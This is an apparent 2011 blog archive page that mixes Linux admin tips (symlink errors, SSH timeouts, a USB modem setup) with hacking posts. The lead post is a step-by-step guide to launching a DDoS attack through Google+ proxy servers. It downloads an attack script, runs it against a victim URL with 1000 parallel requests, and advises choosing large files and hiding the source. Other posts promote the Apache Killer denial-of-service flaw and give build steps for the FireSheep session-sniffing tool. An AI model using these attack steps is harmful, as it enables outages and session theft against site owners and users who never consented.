Month: August 2011

Penetration Testing Web Exploitation Tools

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

Post author By Syed Alam
Post date August 31, 2011
3 Comments on Launch DDoS Attack Using Google Servers with +DDoS Bash Script

Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy 😀

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;  vulnerable pages are “/_/sharebox/linkpreview/“  and “gadgets/proxy?“

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation 😀

e.g 1000 is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

If you have any question or unable to run this, Feel free to write us 🙂

Tags DDoS or Dos, DDoS or DoS attack, Google

Linux Troubleshootings

symbolic link not allowed or link target not accessible

Post author By Syed Alam
Post date August 28, 2011

Today I was migrating CPanel account to another server using a WHM/Cpanel Utility /scripts/pkgaccount. Package was successfully migrated to a new server and domain was live again on new server. But several functionality of the site was not working and the following error was appearing in apache error log constantly.

symbolic link not allowed or link target not accessible

There are two possibility of this error:

Your apache configuration doesn’t allow to Follow Sym Links.
Your SymLink owner doesn’t match (This usually happens on WHM/CPanel because CPanel uses unique user for unique domain)

Fix “symbolic link not allowed or link target not accessible” on WHM/CPanel Server :

Connect to your WHM/CPanel with root privileges from browser e.g http://example.com:2086

Go To

Main >> Service Configuration >> Apache Configuration >> Global Configuration

Check FollowSymLink

FollowSymLinks

Now, in our example your domain name is hackersgarage.com and your CPanel user is hacker. Simple change ownership of your symlink files to hacker

Jumple to document root of your domain
cd /home/hacker/public_html/

Change ownership
chown hacker:hacker *

If you are still having difficulties or unable to change ownership of files or its just not working.
You can again Go To;

Main >> Service Configuration >> Apache Configuration >> Global Configuration

Uncheck SymLinksIfOwnerMatch

SymLinksIfOwnerMatch

Save it! It should rebuild Apache configuration and reload httpd daemon.

Fix “symbolic link not allowed or link target not accessible” on With Control Panel Server (CentOS/Ubuntu/RedHat):

vim /etc/httpd/conf/httpd.conf

Add

Options +FollowSymLinks -SymLinksIfOwnerMatch

Reload httpd
/etc/init.d/httpd reload

on debian base distro;
/etc/init.d/apache gracefull

If you don’t have access to httpd.conf, you can add this in your .htaccess of your document root.
vim .htaccess

Options +FollowSymLinks -SymLinksIfOwnerMatch

Save it! Here you don’t need to reload httpd daemon.

Note : Using .htaccess method you need to make sure, your httpd.conf is configured/instructed to read .htaccess in your document root.

Tags CPanel/WHM

HowTos Linux

How to use PTCL EVO USB device on Linux?

Post author By Syed Alam
Post date August 27, 2011

We have already written a brief How To use worldcall USB on Linux.

To use PTCL Evo device on Linux, follow the previous HowTo and update the username/password in /etc/wvdial.conf as follows;

vi /etc/wvdial.conf

Update following;

Username = wcall@worldcall.com
Password = wcall

Username = vwireless@ptcl.com
Password = ptcl

and run;

wvdial

DONE!

Tags USB Internet on Linux

Penetration Testing Web Exploitation Tools

Apache Killer – Denial of Service Flaw in Apache WebServer

Post author By Syed Alam
Post date August 26, 2011
14 Comments on Apache Killer – Denial of Service Flaw in Apache WebServer

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apache server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix 😀

Tags Apache, apachekiller.pl

HowTos Linux

Disable SSH timeout

Post author By Syed Alam
Post date August 25, 2011

If you ever see your SSH session gets killed, don’t panic 😀 There is nothing wrong, you need to modify the following directives in your /etc/ssh/sshd_config

vim /etc/ssh/sshd_config

Update these directives :

TCPKeepAlive yes
ClientAliveInterval 30
ClientAliveCountMax 99999

Restart ssh daemon

/etc/init.d/sshd restart

DONE!

Tags SSH

HowTos Linux Penetration Testing Privilege Escalation

How to install FireSheep on Linux

Post author By Syed Alam
Post date August 24, 2011
1 Comment on How to install FireSheep on Linux

What is FireSheep ?

Come on damn.. Its not new! 😀 Its an old firefox addon. I am explaining it here for how can you use or install it on Linux.

Lets start ;

Taking Checkout from the repository :

git clone https://github.com/codebutler/firesheep.git

Output :

Initialized empty Git repository in /root/firesheep/.git/
remote: Counting objects: 1020, done.
remote: Compressing objects: 100% (605/605), done.
remote: Total 1020 (delta 589), reused 770 (delta 402)
Receiving objects: 100% (1020/1020), 5.48 MiB | 123 KiB/s, done.
Resolving deltas: 100% (589/589), done.

cd firesheep/ git submodule update --init

Output :

Output :Submodule ‘backend/deps/http-parser’ (git://github.com/ry/http-parser.git) registered for path ‘backend/deps/http-parser’
Initialized empty Git repository in /root/firesheep/backend/deps/http-parser/.git/
remote: Counting objects: 815, done.
remote: Compressing objects: 100% (328/328), done.
remote: Total 815 (delta 549), reused 735 (delta 483)
Receiving objects: 100% (815/815), 185.18 KiB | 95 KiB/s, done.
Resolving deltas: 100% (549/549), done.
Submodule path ‘backend/deps/http-parser’: checked out ‘459507f534c807d8ba741730fbc36d4b93b133c1’

Dependencies :

apt-get install libpcap-dev xulrunner-1.9.2-dev libboost-all-dev libtool libhal-dev autoconf

Compilation :

./autogen.sh make

DONE!

How to Load it into Firefox?

firefox build/firesheep.xpi

Tags FireSheep, Sniffing